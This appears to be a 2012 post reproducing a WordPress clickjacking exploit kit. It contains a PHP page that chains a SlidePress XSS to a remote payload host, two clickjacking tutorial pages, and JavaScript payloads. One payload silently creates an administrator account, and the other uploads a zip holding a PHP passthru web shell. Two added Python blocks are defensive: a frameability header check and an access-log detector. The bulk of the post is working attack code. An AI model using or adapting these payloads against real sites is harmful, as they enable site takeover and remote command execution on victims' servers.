25 January 2012

Wordpress Clickjack Exploit

Clickjacking For Shells

How does it work?
A full explanation is in the PDF (linked as "ClickMe").
What do we need?
Check all the files listed on this page.

clickjack.php

PHP Code:
<!--
WordPress Example Exploit #3 (Chains SlidePress XSS with JS Payloads)
WordPress versions 3.1.2 and lower are vulnerable.
by Andrew Horton aka urbanadventurer
-->
<html>
<head>
<title>Clickjack Exploit for WordPress v3 by urbanadventurer</title>
</head>
<body>

<?
$wp_host="http://wordpress"; $wp_path="/"; $wp_plugin="slidepress"; $wp_payload_js="http://hax0r/wordpress-upload-shell-payload.js";
?>
<style>
#outerdiv {
width:100px; height:30px; overflow:hidden;
z-index:10; opacity:0;
position:absolute; top:135px; left:445px;
}

.stage2 {
opacity:0;
}

#para { width:550px; }

.clickjack { width:100px; height:30px; position:absolute; top:145px; left:450px; }
</style>

<h1>WordPress Clickjack Exploit v3</h1>

<p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi.</p>
<div class='clickjack'><a href='#'>read more</a></div>

<div id="outerdiv" >
<iframe id="outerframe" scrolling='no' src="data:text/html;charset=utf-8,
<style>
.inneriframe {
position:absolute; top:-40px; left:-10px; width:200px; height:100px; border: none;
}
</style>

<script>
var load_count=0;

function frameloaded() {
    load_count=load_count+1;
    if (load_count==2) {
        ex();
    }
}

function ex() {
    top.document.getElementById('stage2').src='<? echo $wp_host.$wp_path?>wp-content/plugins/<? echo $wp_plugin?>/tools/preview.php?sspWidth=1&sspHeight=1%3'+'C/script%3E'+'%3'+'Cscript%20src=<? echo $wp_payload_js?>?i='+Math.random()+'%3E%3'+'C/script%3E%3'+'Cnos'+'cript%3E&sspGalleryId=1&wp_path=<? echo $wp_path?>&a=></if'+'rame>';
}
</script>
<iframe id='inneriframe' class='inneriframe' onload='frameloaded();' name='_parent' scrolling='no'
src='<? echo $wp_host.$wp_path?>wp-admin/plugin-install.php?tab=plugin-information&plugin=<? echo $wp_plugin?>&TB_iframe=true&width=600&height=581'>
</iframe>
"></iframe>
</div>
<iframe class='stage2' style='height:0px;width:0px;' id='stage2'> </iframe>

</body>
</html>

index-1.html
PHP Code:
<html>
<head><title>Clickjack Exploit for WordPress v1</title></head>
<body>
<style>
#outerdiv {
width:100px; height:30px; overflow:hidden;
z-index:10; opacity:0;
position:absolute; top:135px; left:445px;
}
#inneriframe { position:absolute; top:-40px; left:-10px; width:200px; height:100px; border: none; }
#para { width:650px; }
.clickjack { width:100px; height:30px; position:absolute; top:145px; left:450px; }
</style>

<h1>WordPress Clickjack Exploit v1</h1>

<p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi.</p>
<div class='clickjack'><a href='#'>read more</a></div>

<div id="outerdiv">
<iframe id="inneriframe" scrolling="no" src="http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581"> </iframe>
</div>

<p id="para" style="margin-top:50px;">An Install Now button is hidden in front of the 'read more' link. When clicked, this will install a WordPress plugin. After installation, the user is redirected to a page acknowledging the new plugin.</p>

<p>The hidden iframe contains : <a href="http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581">http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581</a></p>
</body>
</html>
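The whole trick above depends on the wp-admin page being loadable inside a third-party iframe with opacity:0. As an added example (not part of the original post or Andrew Horton's files), the following check takes a page's response headers and decides whether an arbitrary origin could frame it, honouring CSP frame-ancestors over X-Frame-Options the way browsers do. The header sets and origins are constructed for the example.

```python
from urllib.parse import urlsplit

def _source_allows(source, framer, page):
    """Match one CSP frame-ancestors source expression against the framer origin."""
    src = source.lower()
    if src == "'none'":
        return False
    if src == "'self'":
        return framer.lower() == page.lower()
    if src == "*":
        return True
    f = urlsplit(framer.lower())
    scheme, _, host = src.rpartition("://")   # scheme is '' when the source has none
    if scheme and scheme != f.scheme:
        return False
    host = host.split("/", 1)[0]              # ignore any path part
    if host.startswith("*."):                 # "*.example.com" matches subdomains only
        return f.netloc.endswith(host[1:])
    return f.netloc == host

def may_be_framed(headers, page_origin, framer_origin):
    """True if a frame hosted on framer_origin may embed the page at page_origin.

    headers: (name, value) pairs from the page's response. CSP frame-ancestors
    takes precedence over X-Frame-Options, as in browsers; with neither header
    the page is frameable from anywhere, which is what the decoy page needs.
    """
    merged = {}
    for name, value in headers:
        merged.setdefault(name.lower(), []).append(value.strip())
    for csp in merged.get("content-security-policy", []):
        for directive in csp.split(";"):
            parts = directive.split()
            if parts and parts[0].lower() == "frame-ancestors":
                sources = parts[1:] or ["'none'"]   # an empty source list means 'none'
                return any(_source_allows(s, framer_origin, page_origin) for s in sources)
    for xfo in merged.get("x-frame-options", []):
        if xfo.upper() == "DENY":
            return False
        if xfo.upper() == "SAMEORIGIN":
            return framer_origin.lower() == page_origin.lower()
        # ALLOW-FROM and unknown values are handled inconsistently by browsers;
        # treat them as frameable so the check errs toward flagging the page.
    return True

# Constructed sample responses for a wp-admin page (not captured from any site).
WP_ADMIN_NO_POLICY = [("Content-Type", "text/html")]
WP_ADMIN_XFO = [("Content-Type", "text/html"), ("X-Frame-Options", "SAMEORIGIN")]
WP_ADMIN_CSP = [("Content-Security-Policy",
                 "default-src 'self'; frame-ancestors 'self' https://*.trusted.example")]
```

Run it over the headers of every admin page behind a login: any page that returns True for a foreign origin is a candidate for exactly the overlay shown in index-1.html.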

index-2.html

PHP Code:
<html>
<head><title>Clickjack Exploit for WordPress v2</title></head>
<body>
<style>
#outerdiv {
width:100px; height:30px; overflow:hidden;
z-index:10; opacity:0;
position:absolute; top:135px; left:445px;
}
#para { width:650px; }
.clickjack { width:100px; height:30px; position:absolute; top:145px; left:450px; }
</style>

<h1>WordPress Clickjack Exploit v2</h1>

<p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi.</p>
<div class='clickjack'><a href='#'>read more</a></div>

<div id="outerdiv">
<iframe src="index-2-inner.html"> </iframe>
</div>

<p id="para" style="margin-top:50px;">An Install Now button is hidden in front of the 'read more' link. When clicked, this will install a WordPress plugin. After installation, the user is not redirected to a page acknowledging the new plugin.</p>

<p>The hidden iframe contains : <a href="http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581">http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581</a></p>
</body>
</html>

index-2-inner.html
PHP Code:
<style>
#inneriframe {
position:absolute; top:-40px; left:-10px; width:200px; height:100px;
border: none; /* removes borders of iframes, grey horizontal and vertical lines in firefox */
}
</style>

<iframe id="inneriframe" name="_parent" scrolling="no" src="http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581">
wordpress
</iframe>

wordpress-add-admin-payload.js
Code:
/*
WordPress JavaScript Exploit Payload to Create an Admin User
Known to work with WordPress version 3.1.2
by Andrew Horton aka urbanadventurer
*/

path_to_wp = "/wordpress-2.9.2";
new_username="alpha4";
new_password="alpha004";
new_email="alpha4%40mailinator.com"; // %40 for @

xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET",path_to_wp + "/wp-admin/user-new.php",true);

xmlhttp.onreadystatechange=function() {
    if (xmlhttp.readyState==4) {
            response=xmlhttp.responseText;
            nonce=response.split('hidden" id="_wpnonce')[1];
            nonce=nonce.split('"')[4];

            xmlhttp.open("POST", path_to_wp + "/wp-admin/user-new.php",true);
            xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

            post_data="_wpnonce=" + nonce + "&action=adduser&user_login=" + new_username + "&first_name=&last_name=&email=" +
                new_email + "&url=&pass1=" + new_password + "&pass2=" + new_password + "&role=administrator&adduser=Add+User";
            xmlhttp.setRequestHeader("Content-Length",post_data.length);
            xmlhttp.send(post_data);
    }
}

xmlhttp.send(null);

wordpress-upload-shell-payload.js
Code:
/*
WordPress JavaScript Exploit Payload to Upload a PHP Shell
Known to work with WordPress version 3.1.2
by Andrew Horton aka urbanadventurer

Uploads a PHP Shell.
Example: http://wordpress/wp-content/plugins/shell/shell.php?cmd=ls
*/

var nonce;
function gup( name )
{
  name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
  var regexS = "[\\?&]"+name+"=([^&#]*)";
  var regex = new RegExp( regexS );
  var results = regex.exec( window.location.href );
  if( results == null )
     return "";
  else
     return results[1];
}

// window.location should contain &wp_path=
path_to_wp = gup('wp_path');

xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET",path_to_wp + "wp-admin/plugin-install.php?tab=upload",true);

xmlhttp.onreadystatechange=function() {
    if (xmlhttp.readyState==4) {

        response=xmlhttp.responseText;
        nonce=response.split('hidden" id="_wpnonce')[1];
        nonce=nonce.split('"')[4];
        
        xmlhttp.open("POST", path_to_wp + "wp-admin/update.php?action=upload-plugin",true);
        
        xmlhttp.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------304661183327760");

        // shell.zip contains
        // shell.php which is <? passthru($_REQUEST['cmd']); ?>
        
        post_data="-----------------------------304661183327760\r\n"+
            "Content-Disposition: form-data; name=\"_wpnonce\"\r\n\r\n"+
            nonce + "\r\n"+
            "-----------------------------304661183327760\r\n"+
            "Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n"+
            path_to_wp + "wp-admin/plugin-install.php?tab=upload\r\n"+
            "-----------------------------304661183327760\r\n"+
            "Content-Disposition: form-data; name=\"pluginzip\";\r\n"+
            "filename=\"shell.zip\"\r\n"+
            "Content-Type: application/octet-stream\r\n\r\n";

            post_data=post_data+"\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x3b\x7a\xf6\x3c\x21\xbd\x50\x0a\x22\x00\x00\x00\x22\x00\x00\x00\x09\x00\x00\x00\x73\x68\x65\x6c\x6c\x2e\x70\x68\x70\x3c\x3f\x20\x70\x61\x73\x73\x74\x68\x72\x75\x28\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x5b\x27\x63\x6d\x64\x27\x5d\x29\x3b\x20\x3f\x3e\x0a\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00\x3b\x7a\xf6\x3c\x21\xbd\x50\x0a\x22\x00\x00\x00\x22\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x00\x00\x00\x00\x00\x00\x73\x68\x65\x6c\x6c\x2e\x70\x68\x70\x50\x4b\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x37\x00\x00\x00\x49\x00\x00\x00\x00\x00\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x33\x30\x34\x36\x36\x31\x31\x38\x33\x33\x32\x37\x37\x36\x30\x2d\x2d\x0d\x0a";
        
        xmlhttp.setRequestHeader("Content-Length",post_data.length);
        xmlhttp.sendAsBinary(post_data);
    }
}

xmlhttp.send(null);
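Both payloads leave a recognisable trace in the web server's access log: the reflected-XSS request to the SlidePress preview.php (script tags inside the sspHeight parameter), followed seconds later by an admin-side POST (update.php?action=upload-plugin or user-new.php) from the same client, because the XHR runs in the victim's browser. As an added example that is not part of the original post, the detection below parses combined-format log lines and correlates those two events; the log sample is constructed, with hax0r reused as the payload host from clickjack.php.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx combined log format: client ip, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
SCRIPT_TAG = re.compile(r"</?script", re.I)

def classify(line):
    """Return an event dict for a log line of interest, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["url"])
    path = url.path.lower()
    query = unquote(unquote(url.query))   # decode twice to catch %253C-style double encoding
    if path.endswith("/tools/preview.php") and "/plugins/slidepress/" in path and SCRIPT_TAG.search(query):
        kind = "slidepress_xss"        # script tags reflected through sspHeight/sspWidth
    elif m["method"] == "POST" and path.endswith("/wp-admin/update.php") \
            and parse_qs(url.query).get("action") == ["upload-plugin"]:
        kind = "plugin_upload"         # the zip-with-shell.php upload in the payload
    elif m["method"] == "POST" and path.endswith("/wp-admin/user-new.php"):
        kind = "user_add"              # the add-admin payload's final request
    else:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT), "kind": kind}

def find_chains(lines, window=timedelta(minutes=10)):
    """(ip, kind) for every admin-side POST that follows an XSS hit from the same client within window."""
    events = [e for e in map(classify, lines) if e]
    chains = []
    for x in events:
        if x["kind"] != "slidepress_xss":
            continue
        for e in events:
            delay = (e["ts"] - x["ts"]).total_seconds()
            if e["ip"] == x["ip"] and e["kind"] != "slidepress_xss" and 0 <= delay <= window.total_seconds():
                chains.append((e["ip"], e["kind"]))
    return chains

# Constructed access-log sample (not real traffic); the last two lines are benign noise.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Jan/2012:10:14:02 +0000] "GET /wp-content/plugins/slidepress/tools/preview.php?sspWidth=1&sspHeight=1%3C/script%3E%3Cscript%20src=http://hax0r/wordpress-upload-shell-payload.js%3E%3C/script%3E&sspGalleryId=1 HTTP/1.1" 200 512
203.0.113.7 - - [25/Jan/2012:10:14:04 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 2210
198.51.100.9 - - [25/Jan/2012:10:20:00 +0000] "GET /wp-content/plugins/slidepress/tools/preview.php?sspWidth=640&sspHeight=480&sspGalleryId=1 HTTP/1.1" 200 512
198.51.100.9 - - [25/Jan/2012:11:05:00 +0000] "POST /wp-admin/user-new.php HTTP/1.1" 302 0
"""
```

A lone POST to user-new.php is normal administration; the signal is the preceding script-bearing preview.php request from the same address, which is why the correlation, not either event alone, is what should page someone.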

Files:
clickjack.php - The final clickjacking exploit
index-1.html - Tutorial 1 of how to exploit clickjacking
index-2.html - Tutorial 2 of how to exploit clickjacking
index-2-inner.html - Part of Tutorial 2
wordpress-add-admin-payload.js - Cross Site Scripting (XSS) Payload
wordpress-upload-shell-payload.js - Cross Site Scripting (XSS) Payload
 

wordpress-clickjack.zip
Special Thanks to:

aB
